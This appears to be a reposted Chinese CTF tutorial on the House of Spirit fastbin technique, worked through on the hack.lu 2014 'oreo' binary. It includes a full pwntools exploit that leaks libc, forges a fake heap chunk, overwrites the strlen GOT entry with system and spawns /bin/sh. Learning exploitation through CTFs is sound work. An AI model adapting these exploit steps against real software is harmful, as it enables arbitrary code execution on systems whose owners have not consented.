Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit

2024-01-22 21:38

本文主要是介绍Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x10 基础知识

关于 bin 的一些特点

  • malloc 返回值,指向 chunk 的 user data

  • 每个 bin 采取 LIFO 策略,最近被释放的 chunk 优先被再次使用

关于 fastbin 的一些特点

案例

int main(void)
{void *chunk1,*chunk2,*chunk3;chunk1=malloc(0x30);chunk2=malloc(0x30);chunk3=malloc(0x30);//进行释放free(chunk1);free(chunk2);free(chunk3);return 0;
}

第一次 free

fastbin(fd) -> chunk1

第二次 free

fastbin(fd) -> chunk2 -> chunk1 

全部释放后,chunk1、chunk2、chunk3 数据结构中的 fd 指针(指向下一个相邻 chunk)如下

fastbin(fd) -> chunk3 -> chunk2 -> chunk1

fastbin 中的 chunk 并没有使用 bk,这也从侧面说明 fastbin 使用单链表来维护和释放堆块的。且 fastbin 中的 next chunk 的 previous chunk 位不会被清空

0x20 2014 hack.lu oreo

题目链接

0x21 程序分析

简单分析,运行程序并结合反编译的代码

  1. Add new rifle

    sub_8048644(),添加一把枪,用户输入的 name 存在堆溢出,可以覆盖下一个 chunkdesc       name          previous┌──────────┬──────────────┬──┐│          │              │  │└──────────┴──────────────┴──┘
    addr       +25            +52转换成结构体,其实就是
    struct Rifle{char desc[25];char name[27];char *previous;
    }
    
  2. Show added rifles

    sub_8048729(),打印所有添加的抢的名字和描述(倒叙)
    
  3. Order selected rifles

    sub_8048810(),循环释放步骤1 每一个申请的 chunk
    
  4. Leave a Message with your Order

    sub_80487B4(), 将输入的消息存放至全局变量 dword_804A2A8,而该变量指向的地址空间就是相邻的下一个存储空间.bss:0804A2A8 dword_804A2A8   dd ?                    ; DATA XREF: sub_80487B4+23↑r
    .bss:0804A2A8                                         ; sub_80487B4+3C↑r ...
    .bss:0804A2AC                 align 20h
    .bss:0804A2C0 unk_804A2C0     db    ? ;               ; DATA XREF: main+29↑o
    .bss:0804A2C1                 db    ? ;
    .bss:0804A2C2                 db    ? ;
    .bss:0804A2C3                 db    ? ;
    
  5. Show current stats

    sub_8048906(),打印 rifle 的 count/order_count/word_804A2A8,即数量、订购数量、订购留言
    
  6. Exit!

很明显,add_rifle 申请的 chunk 存在溢出,chunk 的地址又可以被覆盖,且会被 select_rifle 释放。因此可以实现释放任意地址空间,这个地址空间就是我们需要伪造的 fastbin chunk。释放伪造的 chunk,这就是 House of Spirit 的核心。释放之后再次申请相同大小的内存,那么就会分配想要的地址。

根据 free 函数的源码,伪造的 chunk 应该满足以下条件,才会被放入 fastbin

  • ISMMAP 位不能为 1,即不能使 mmap 函数申请的内存,否则会被单独处理
  • 地址对齐,这是基本要求
  • 大小在 fastbin 范围之内
  • fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free
  • 下一个 chunk 的 size 在 bin 上

House of Spirit 的目标是实现任意地址写

0x22 漏洞利用

1 控制 rifle->previous,泄露 libc

需要注意的两点

  • 在这个程序中,没有使用 setvbuf 设置输出缓冲,在遇到 printf 打印没有 '\n’的字符串时,可能不会输出到终端
  • 注意偏移的计算,previous 指针的偏移,IDA 反编译的代码 *((_DWORD *)rifle + 13) = v1; 应该是 13 * 4 = 0x34,这一点从汇编代码也能看出来 mov [eax+34h], edx
# 1.leak libc
add_rifle(b'a' * 27 + p32(pwn_elf.got["printf"]), b'b' * 25)
show_rifle()
io.recvuntil(b"===================================\n")
io.recvuntil(b"===================================\n")
io.recvuntil(b"Description: ")
printf_addr = u32(io.recv(4))
print("printf_addr: " + hex(printf_addr))
libc_base = printf_addr - libc_elf.sym["printf"]
print("libc_base: " + hex(libc_base))

2 伪造 chunk,实现任意地址写

dword_804A2A8 = (char *)&unk_804A2C0;,这是选项 4 能够写入的用户订单留言信息,如果我们能够控制 dword_804A2A8 的值,就可以实现任意地址写

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Sa3bUfkd-1625744375664)(fake_chunk_addr.png)]

所以现在的思路就是利用堆溢出,修改 previous 指针,指向 0x0804A2A8(地址刚好已经对齐),这个地址就是我们需要伪造的 chunk。

对于 fake chunk 的布局,以绕过 free 函数的检查

  • fake chunk size = count,为了和 malloc(0x38) 保持一致可以设置为 0x41(也可以设置成其他值,当然大小要在 fastbin 范围内,且最后一位为 1)

    add_file() 一共运行 0x41 次即可

  • 下一个 chunk size 的 IN_USE = 1

    需要计算偏移量,这里注意偏移:0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0,刚好没有使用 chunk 的空间复用!

  • fake chunk 的 previous 应该指向 Null,否则会继续 free 一个不存在的地址空间

    *(0x0804A2A8 + 0x34 - 0x0804A2C0) = 0x00

代码如下

# house of spirit
for i in range(0x41 - 0x2):add_rifle(b'a', b'b')add_rifle(b'a' * 27 + p32(0x0804A2A8), b'b' * 25)offset = 0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0
leave_msg(b'\x00' * offset + p32(0x41))	# \x00 是为了满足 fake chunk 没有后续的 chunk!
order_rifle()							# free
add_rifle()								# malloc,实现任意地址写
leave_msg()

3 覆盖 GOT 表

got.plt 节有几个函数,选择的函数应该符合入参可控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NryBnnU-1625744375666)(got.png)]

我们发现 strlen() 刚好是 leave_msg() 的 msg,因此,在修改 got 表同时,也传入了入参

add_rifle(b'a', p32(pwn_elf.got["strlen"]))			# malloc
leave_msg(p32(libc_elf.sym["system"]) + b";/bin/sh")

相当于执行了 system(p32(libc_elf.sym["system"]), ';/bin/sh')

0x30 总结

本次例题漏洞点在于堆溢出可修改 chunk 地址,实现 free 任意地址的 chunk(前提是这个地址的前后部分我们能够控制,达到 free 检查),这样再次申请,可以得到我们伪造的 chunk。fake chunk 的空间指向的地址,如果能够被修改,即可实现任意地址写。

堆的利用方式千变万化,House of Spirit 只是其中的一种(Fastbin attack),通过伪造的 fake chunk,可以实现任意地址写的目的,进而覆盖 GOT 表的函数地址。

exp

from pwn import *def add_rifle(name, desc):io.sendline(b"1")io.sendline(name)io.sendline(desc)def show_rifle():io.sendline(b"2")def order_rifle():io.sendline(b"3")def leave_msg(msg):io.sendline(b"4")io.sendline(msg)context(log_level="debug", os="Linux", arch="i386")
pwn_elf = ELF("./oreo")
libc_elf = ELF("/lib32/libc.so.6")
io = process("./oreo")
gdb.attach(io, "b free")
io.recv()# 1.leak libc
add_rifle(b'a' * 27 + p32(pwn_elf.got["printf"]), b'b' * 25)
show_rifle()
io.recvuntil(b"===================================\n")
io.recvuntil(b"===================================\n")
io.recvuntil(b"Description: ")
printf_addr = u32(io.recv(4))
print("printf_addr: " + hex(printf_addr))
libc_base = printf_addr - libc_elf.sym["printf"]
print("libc_base: " + hex(libc_base))# house of spirit
for i in range(0x41 - 0x2):add_rifle(b'a', b'b')
add_rifle(b'a' * 27 + p32(0x0804A2A8), b'b' * 25)# fake chunk
offset = 0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0
leave_msg(b'\x00' * offset + p32(0x41))
order_rifle()		# free
#io.recv()# GOT
add_rifle(b'a', p32(pwn_elf.got["strlen"]))			# mallocleave_msg(p32(libc_base + libc_elf.sym["system"]) + b";/bin/sh")
io.recv()
io.interactive()

这篇关于Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/634319

相关文章

Linux换行符的使用方法详解

《Linux换行符的使用方法详解》本文介绍了Linux中常用的换行符LF及其在文件中的表示,展示了如何使用sed命令替换换行符,并列举了与换行符处理相关的Linux命令,通过代码讲解的非常详细,需要的... 目录简介检测文件中的换行符使用 cat -A 查看换行符使用 od -c 检查字符换行符格式转换将

Linux系统配置NAT网络模式的详细步骤(附图文)

《Linux系统配置NAT网络模式的详细步骤(附图文)》本文详细指导如何在VMware环境下配置NAT网络模式,包括设置主机和虚拟机的IP地址、网关,以及针对Linux和Windows系统的具体步骤,... 目录一、配置NAT网络模式二、设置虚拟机交换机网关2.1 打开虚拟机2.2 管理员授权2.3 设置子

Linux系统中卸载与安装JDK的详细教程

《Linux系统中卸载与安装JDK的详细教程》本文详细介绍了如何在Linux系统中通过Xshell和Xftp工具连接与传输文件,然后进行JDK的安装与卸载,安装步骤包括连接Linux、传输JDK安装包... 目录1、卸载1.1 linux删除自带的JDK1.2 Linux上卸载自己安装的JDK2、安装2.1

Spring Boot + MyBatis Plus 高效开发实战从入门到进阶优化(推荐)

《SpringBoot+MyBatisPlus高效开发实战从入门到进阶优化(推荐)》本文将详细介绍SpringBoot+MyBatisPlus的完整开发流程,并深入剖析分页查询、批量操作、动... 目录Spring Boot + MyBATis Plus 高效开发实战:从入门到进阶优化1. MyBatis

Linux卸载自带jdk并安装新jdk版本的图文教程

《Linux卸载自带jdk并安装新jdk版本的图文教程》在Linux系统中,有时需要卸载预装的OpenJDK并安装特定版本的JDK,例如JDK1.8,所以本文给大家详细介绍了Linux卸载自带jdk并... 目录Ⅰ、卸载自带jdkⅡ、安装新版jdkⅠ、卸载自带jdk1、输入命令查看旧jdkrpm -qa

Linux samba共享慢的原因及解决方案

《Linuxsamba共享慢的原因及解决方案》:本文主要介绍Linuxsamba共享慢的原因及解决方案,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux samba共享慢原因及解决问题表现原因解决办法总结Linandroidux samba共享慢原因及解决

新特性抢先看! Ubuntu 25.04 Beta 发布:Linux 6.14 内核

《新特性抢先看!Ubuntu25.04Beta发布:Linux6.14内核》Canonical公司近日发布了Ubuntu25.04Beta版,这一版本被赋予了一个活泼的代号——“Plu... Canonical 昨日(3 月 27 日)放出了 Beta 版 Ubuntu 25.04 系统镜像,代号“Pluc

Linux安装MySQL的教程

《Linux安装MySQL的教程》:本文主要介绍Linux安装MySQL的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux安装mysql1.Mysql官网2.我的存放路径3.解压mysql文件到当前目录4.重命名一下5.创建mysql用户组和用户并修

Linux上设置Ollama服务配置(常用环境变量)

《Linux上设置Ollama服务配置(常用环境变量)》本文主要介绍了Linux上设置Ollama服务配置(常用环境变量),Ollama提供了多种环境变量供配置,如调试模式、模型目录等,下面就来介绍一... 目录在 linux 上设置环境变量配置 OllamPOgxSRJfa手动安装安装特定版本查看日志在

Linux系统之主机网络配置方式

《Linux系统之主机网络配置方式》:本文主要介绍Linux系统之主机网络配置方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、查看主机的网络参数1、查看主机名2、查看IP地址3、查看网关4、查看DNS二、配置网卡1、修改网卡配置文件2、nmcli工具【通用